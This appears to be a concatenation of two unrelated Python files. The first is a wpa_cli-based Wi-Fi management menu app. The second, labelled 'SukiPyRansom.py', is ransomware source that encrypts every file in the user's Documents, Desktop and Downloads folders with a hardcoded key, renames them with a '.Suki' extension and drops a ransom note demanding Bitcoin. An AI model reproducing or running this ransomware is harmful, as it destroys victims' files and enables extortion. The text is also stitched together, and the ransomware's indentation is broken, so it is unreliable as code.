o = None
from time import sleep
from threading import Thread
from traceback import format_exc
from ui import Menu, Printer, MenuExitException, UniversalInput, Refresher, DialogBox, ellipsize
import wpa_cli
logger = setup_logger(__name__, "warning")
def show_scan_results():
    """Build and activate a menu of networks found by the last scan.

    Networks with an empty SSID are labeled '[Hidden]'.
    """
    network_menu_contents = []
    networks = wpa_cli.get_scan_results()
    for network in networks:
        # BUG FIX: the original's if/elif pair left 'ssid' unbound (NameError)
        # when network["ssid"] was falsy but not '' (e.g. None).
        ssid = network["ssid"] if network["ssid"] else '[Hidden]'
        # Default-argument binding captures the current network for the lambda.
        network_menu_contents.append([ssid, lambda x=network: network_info_menu(x)])
    network_menu = Menu(network_menu_contents, i, o, "Wireless network menu")
    network_menu.activate()
def network_info_menu(network_info):
    """Show a detail/action menu for a single scanned network."""
    security_label = "Open" if wpa_cli.is_open_network(network_info) else "Secured"
    contents = [
        ["Connect", lambda x=network_info: connect_to_network(x)],
        ["BSSID", lambda x=network_info['bssid']: Printer(x, i, o, 5, skippable=True)],
        ["Frequency", lambda x=network_info['frequency']: Printer(x, i, o, 5, skippable=True)],
        [security_label, lambda x=network_info['flags']: Printer(x, i, o, 5, skippable=True)],
    ]
    Menu(contents, i, o, "Wireless network info", catch_exit=False).activate()
def connect_to_network(network_info):
    """Connect to the given scanned network.

    Known networks are re-enabled; open networks are added with key_mgmt=NONE;
    otherwise the user is prompted for a password. Raises MenuExitException
    once connecting has started (closes the enclosing menus); returns False
    when the user cancels the password prompt.
    """
    # First, looking in the known networks
    configured_networks = wpa_cli.list_configured_networks()
    for network in configured_networks:
        if network_info['ssid'] == network['ssid']:
            Printer([network_info['ssid'], "known,connecting"], i, o, 1)
            wpa_cli.enable_network(network['network id'])
            wpa_cli.save_config()
            raise MenuExitException
    # Then, if it's an open network, just connecting
    if wpa_cli.is_open_network(network_info):
        network_id = wpa_cli.add_network()
        Printer(["Network is open", "adding to known"], i, o, 1)
        ssid = network_info['ssid']
        wpa_cli.set_network(network_id, 'ssid', '"{}"'.format(ssid))
        wpa_cli.set_network(network_id, 'key_mgmt', 'NONE')
        Printer(["Connecting to", network_info['ssid']], i, o, 1)
        wpa_cli.enable_network(network_id)
        wpa_cli.save_config()
        raise MenuExitException
    # Offering to enter a password
    else:
        # Renamed from 'input', which shadowed the builtin.
        password_input = UniversalInput(i, o, message="Password:", name="WiFi password enter UI element")
        password = password_input.activate()
        if password is None:
            return False
        network_id = wpa_cli.add_network()
        Printer(["Password entered", "adding to known"], i, o, 1)
        ssid = network_info['ssid']
        wpa_cli.set_network(network_id, 'ssid', '"{}"'.format(ssid))
        wpa_cli.set_network(network_id, 'psk', '"{}"'.format(password))
        Printer(["Connecting to", network_info['ssid']], i, o, 1)
        wpa_cli.enable_network(network_id)
        wpa_cli.save_config()
        raise MenuExitException
#No WPS PIN input possible yet and I cannot yet test WPS button functionality.
etdn_thread = None  # Well-hidden global: the single background re-enable thread.
def enable_temp_disabled_networks():
    """Start a background pass re-enabling temp-disabled networks.

    No-op if a pass is already running.
    """
    global etdn_thread
    if etdn_thread:
        return
    etdn_thread = Thread(target=etdn_runner)
    etdn_thread.daemon = True
    etdn_thread.start()
def etdn_runner():
    """Re-enable every saved network wpa_supplicant has temp-disabled.

    Runs on the background thread started by enable_temp_disabled_networks();
    clears the thread marker when done.
    """
    global etdn_thread
    saved_networks = wpa_cli.list_configured_networks()
    for network in saved_networks:
        if network["flags"] == "[TEMP-DISABLED]":
            logger.warning("Network {} is temporarily disabled, re-enabling".format(network["ssid"]))
            try:
                # BUG FIX: list_configured_networks() rows use the
                # 'network id' key (see connect_to_network/manage_networks);
                # "network_id" always raised KeyError here, so the network was
                # never actually re-enabled — only the error was logged.
                enable_network(network["network id"])
            except Exception as e:
                logger.error(format_exc())
                logger.exception(e)
    etdn_thread = None
def scan(delay = True, silent = False):
    """Kick off a wi-fi scan, optionally pausing for results to accumulate.

    A "FAIL-BUSY" reply means a scan is already in progress and is reported
    instead of raised; any other WPAException propagates.
    """
    pause_seconds = 1 if delay else 0
    try:
        wpa_cli.initiate_scan()
        enable_temp_disabled_networks()
    except wpa_cli.WPAException as e:
        if e.code != "FAIL-BUSY":
            raise
        if not silent:
            Printer("Still scanning...", i, o, 1)
    else:
        if not silent:
            Printer("Scanning...", i, o, 1)
    finally:
        sleep(pause_seconds)
def reconnect():
    """Force a reconnect by disabling, rescanning, and re-enabling the
    currently connected network.

    Returns True on success, False when not connected or when wpa_cli fails.
    """
    try:
        w_status = wpa_cli.connection_status()
    except Exception:
        # BUG FIX: the original returned a display-row list copy-pasted from
        # status_refresher_data() — a truthy value that read as success.
        Printer("wpa_cli fail!", i, o, 1)
        return False
    ap = w_status.get('ssid', None)
    if not ap:
        Printer("Not connected!", i, o, 1)
        return False
    # Renamed from 'id' (shadowed the builtin).
    network_id = w_status.get('id', None)
    if not network_id:
        logger.error("Current network {} is not in configured network list!".format(ap))
        return False
    disable_network(network_id)
    scan()
    enable_network(network_id)
    return True
def status_refresher_data():
    """Build the list of screen rows shown by the wireless status Refresher."""
    try:
        w_status = wpa_cli.connection_status()
    except:
        return ["wpa_cli fail".center(o.cols)]
    # Pull the raw values, falling back to the literal string 'None'.
    state = w_status['wpa_state']
    ip = w_status.get('ip_address', 'None')
    ap = w_status.get('ssid', 'None')
    # Fit the SSID to the screen width, adding the "SSID: " prefix when it fits.
    if len(ap) > o.cols:
        ap = ellipsize(ap, o.cols)
    if o.cols >= len(ap) + len("SSID: "):
        ap = "SSID: " + ap
    ip_max_len = 15  # 3x4 digits + 3 dots
    if o.cols >= ip_max_len + 4:  # "IP: " disambiguation fits on the screen
        ip = "IP: " + ip
    data = [ap.center(o.cols), ip.center(o.cols)]
    # Extra state row when the screen has more than two rows.
    if o.rows > 2:
        data.append(("St: " + state).center(o.cols))
    # Button usage tips: pad to the bottom, then three hint rows.
    if o.rows >= 6:
        padding_rows = o.rows - 6  # ip, ap, state plus the three hint rows
        data.extend([""] * padding_rows)
        data.append("ENTER: more info".center(o.cols))
        data.append("UP: reconnect".center(o.cols))
        data.append("RIGHT: rescan".center(o.cols))
    return data
def status_monitor():
    """Run the live wireless status screen with its hotkeys."""
    keymap = {
        "KEY_ENTER": wireless_status,
        "KEY_RIGHT": lambda: scan(False),
        "KEY_UP": lambda: reconnect(),
    }
    Refresher(status_refresher_data, i, o, 0.5, keymap, "Wireless monitor").activate()
def wireless_status():
    """Show a menu detailing the current wireless connection state."""
    w_status = wpa_cli.connection_status()
    state = w_status['wpa_state']
    status_menu_contents = [[["state:", state]]] #State is an element that's always there, let's see possible states
    if state == 'COMPLETED':
        #We have bssid, ssid and key_mgmt at least
        status_menu_contents.append(['SSID: '+w_status['ssid']])
        status_menu_contents.append(['BSSID: '+w_status['bssid']])
        key_mgmt = w_status['key_mgmt']
        status_menu_contents.append([['Security:', key_mgmt]])
        #If we have WPA in key_mgmt, we also have pairwise_cipher and group_cipher set to something other than NONE so we can show them
        if key_mgmt != 'NONE':
            try: #What if?
                group = w_status['group_cipher']
                pairwise = w_status['pairwise_cipher']
                status_menu_contents.append([['Group/Pairwise:', group+"/"+pairwise]])
            except:
                pass
    elif state in ['AUTHENTICATING', 'SCANNING', 'ASSOCIATING']:
        pass #These states don't have much information
    #In any case, we might or might not have IP address info
    status_menu_contents.append([['IP address:',w_status['ip_address'] if 'ip_address' in w_status else 'None']])
    #We also always have WiFi MAC address as 'address'
    status_menu_contents.append(['MAC: '+w_status['address']])
    status_menu = Menu(status_menu_contents, i, o, "Wireless status menu", entry_height=2)
    status_menu.activate()
def change_interface():
    """Show a menu of all wireless interfaces; picking one makes it active."""
    contents = [
        [iface, lambda x=iface: change_current_interface(x)]
        for iface in wpa_cli.get_interfaces()
    ]
    Menu(contents, i, o, "Interface change menu").activate()
def change_current_interface(interface):
    """Switch wpa_cli to another interface, report the outcome, and exit the menu.

    NOTE(review): the ``finally: raise MenuExitException`` closes the parent
    interface menu on both success and failure — and would also replace any
    unexpected exception raised inside the try block with MenuExitException.
    This looks intentional (the menu should always close after an attempt);
    confirm before changing.
    """
    try:
        wpa_cli.set_active_interface(interface)
    except wpa_cli.WPAException:
        Printer(['Failed to change', 'interface'], i, o, skippable=True)
    else:
        Printer(['Changed to', interface], i, o, skippable=True)
    finally:
        raise MenuExitException
def save_changes():
    """Persist the running wpa_supplicant configuration to disk."""
    try:
        wpa_cli.save_config()
    except wpa_cli.WPAException:
        Printer(['Failed to save', 'changes'], i, o, skippable=True)
        return
    Printer(['Saved changes'], i, o, skippable=True)
saved_networks = None  # module-level cache of configured networks; (re)filled by manage_networks()
def manage_networks():
    """List configured (saved) networks and open a per-network action menu."""
    global saved_networks
    saved_networks = wpa_cli.list_configured_networks()
    # As of wpa_supplicant 2.3-1, entries have 'network id', 'ssid', 'bssid', 'flags'
    entries = [
        ["{0[network id]}: {0[ssid]}".format(network),
         lambda x=index: saved_network_menu(saved_networks[x])]
        for index, network in enumerate(saved_networks)]
    Menu(entries, i, o, "Saved network menu", catch_exit=False).activate()
def saved_network_menu(network_info):
    """Show actions (select/enable/disable/remove/password/BSSID) for one saved network."""
    global saved_networks
    net_id = network_info['network id']
    net_bssid = network_info['bssid']
    flags = network_info["flags"]
    network_status = flags if flags else "[ENABLED]"
    contents = [
        [network_status],
        ["Select", lambda x=net_id: select_network(x)],
        ["Enable", lambda x=net_id: enable_network(x)],
        ["Disable", lambda x=net_id: disable_network(x)],
        ["Remove", lambda x=net_id: remove_network(x)],
        ["Set password", lambda x=net_id: set_password(x)],
        ["BSSID", lambda x=net_bssid: Printer(x, i, o, 5, skippable=True)]]
    Menu(contents, i, o, "Wireless network info", catch_exit=False).activate()
    # The menu actions may have changed the network list - re-read it on exit.
    saved_networks = wpa_cli.list_configured_networks()
def select_network(id):
    """Make wpa_supplicant use only the given saved network, then persist the config."""
    try:
        wpa_cli.select_network(id)
    except wpa_cli.WPAException:
        Printer(['Failed to', 'select network'], i, o, skippable=True)
        return
    wpa_cli.save_config()
    Printer(['Selected network', str(id)], i, o, skippable=True)
def enable_network(id):
    """Enable the given saved network, persist the config, and report the result."""
    try:
        wpa_cli.enable_network(id)
    except wpa_cli.WPAException:
        Printer(['Failed to', 'enable network'], i, o, skippable=True)
        return
    wpa_cli.save_config()
    Printer(['Enabled network', str(id)], i, o, skippable=True)
def disable_network(id):
    """Disable the given saved network, persist the config, and report the result."""
    try:
        wpa_cli.disable_network(id)
    except wpa_cli.WPAException:
        Printer(['Failed to', 'disable network'], i, o, skippable=True)
        return
    wpa_cli.save_config()
    Printer(['Disabled network', str(id)], i, o, skippable=True)
def remove_network(id):
    """Ask for confirmation, delete the saved network, and close the parent menu."""
    if not DialogBox("yn", i, o, message="Remove network?").activate():
        return
    try:
        wpa_cli.remove_network(id)
    except wpa_cli.WPAException:
        Printer(['Failed to', 'remove network'], i, o, skippable=True)
        return
    wpa_cli.save_config()
    Printer(['Removed network', str(id)], i, o, skippable=True)
    # Leave the per-network menu: its entry no longer exists.
    raise MenuExitException
def set_password(id):
    """Prompt for a new PSK for the given network id and save it.

    Returns False if the user cancelled the input; None on success.
    """
    # Renamed local from 'input' - it shadowed the builtin.
    pw_input = UniversalInput(i, o, message="Password:", name="WiFi password enter UI element")
    password = pw_input.activate()
    if password is None:  # user cancelled the input UI
        return False
    # wpa_cli expects the PSK value wrapped in double quotes.
    wpa_cli.set_network(id, 'psk', '"{}"'.format(password))
    wpa_cli.save_config()
    Printer(["Password entered"], i, o, 1)
def callback():
    """App entry point: verify wpa_cli is usable, then show the main menu."""
    def get_contents():
        # Built dynamically so the displayed current interface stays fresh.
        current_interface = wpa_cli.get_current_interface()
        return [["Status", status_monitor],
        ["Current: {}".format(current_interface), change_interface],
        ["Scan", scan],
        ["Networks", show_scan_results],
        ["Saved networks", manage_networks]]
    # Probe once before showing the menu so setup problems are reported early.
    try:
        get_contents()
    except OSError as e:
        if e.errno == 2:
            # errno 2 (ENOENT): the wpa_cli binary is not installed
            Printer(["Do you have", "wpa_cli?"], i, o, 3, skippable=True)
            return
        else:
            raise e
    except wpa_cli.WPAException:
        Printer(["Do you have", "wireless cards?", "Is wpa_supplicant", "running?"], i, o, 3, skippable=True)
        return
    else:
        Menu([], i, o, "wpa_cli main menu", contents_hook=get_contents).activate()
def init_app(input, output):
    """Store the app's input and output devices in module-level globals."""
    global i, o
    i = input
    o = output
|
SukiPyRansom.py | from tkinter import *
from tkinter.ttk import *
import os, time, threading, base64, sys, random
from cryptography.fernet import Fernet
from os import listdir
from os.path import isfile, join, isdir
paths = ["//Documents", "//Desktop", "//Downloads"]
script_dir = os.path.abspath(sys.argv[0]).split("\\")
script = script_dir[-1]
main_path = os.environ['USERPROFILE']
warn_message = ("""YOUR FILES HAVE BEEN ENCRYPTED !
TO RECOVER YOUR FILES SEND US 10$ BITCOIN
AND SEND THE PAY CONFIRMATION WITH YOUR
TASK NUMBER TO : h3xv1ss1on@protonmail.com
BITCOIN : 1782x9AtVCQgv6GPjb9uHj1EoFhQocgEMs
-Suki@Yosoevsky""")
def pass_gen(lenght, action):
lower = "abcdefghijklmnoqrstuvwxyz"
upper = lower.upper()
numbers = "0123456789"
symbols = "[]{}()*;/,._-"
if action == "with":
mix = lower + upper + numbers + symbols
if action == "without":
mix = lower + upper + numbers
lenght = lenght
password = "".join(random.sample(mix, lenght))
return password
key = "koWFCjKg3wd1MRkOTpIEjcBzv0vYY9qOsEypY33sayE="
''' key for testing only you can use Cryptography module to generate one !'''
extension = ".Suki"
def get_files_list(mypath):
files_list = [f for f in listdir(mypath) if isfile(join(mypath, f))]
return files_list
def get_desktop_files():
path = os.environ['USERPROFILE'] + "\\Desktop"
desktop = []
files = []
def get_folder_list(mypath):
files_list = [f for f in listdir(mypath) if isdir(join(mypath, f))]
return files_list
for folder in get_folder_list(path):
desktop.append(path + "\\" + folder)
for p in desktop:
for i in get_files_list(p):
files.append(p + "\\" + i)
return files
def encrypt(file, key):
f = Fernet(key)
cipher = f.encrypt(file)
return cipher
for path in paths:
os.chdir(main_path + path)
current_directory = os.getcwd()
warn = open("warning.txt", "w+")
warn.write(warn_message)
for file_name in get_files_list(current_directory):
if file_name == script or file_name == "warning.txt":
pass
else:
with open(file_name, "rb") as file:
file = base64.b64encode(file.read())
try:
data = encrypt(file, key)
dest = open(file_name, "wb")
dest.write(data)
dest.close()
os.rename(file_name, file_name + extension)
except:
pass
for file_name in get_desktop_files():
if file_name == script or file_name == "warning.txt":
pass
else:
with open(file_name, "rb") as file:
file = base64.b64encode(file.read())
try:
data = encrypt(file, key)
dest = open(file_name, "wb")
dest.write(data)
dest.close()
os.rename(file_name, file_name + extension)
except:
pass
class mainwindow(Tk):
def __init__(self, special_key):
Tk.__init__(self)
self.title(string="Warning!!!")
self.resizable(0, 0)
self.configure(background='black')
self.style = Style()
self.style.theme_use("clam")
self.special_key = special_key
photo_code = '''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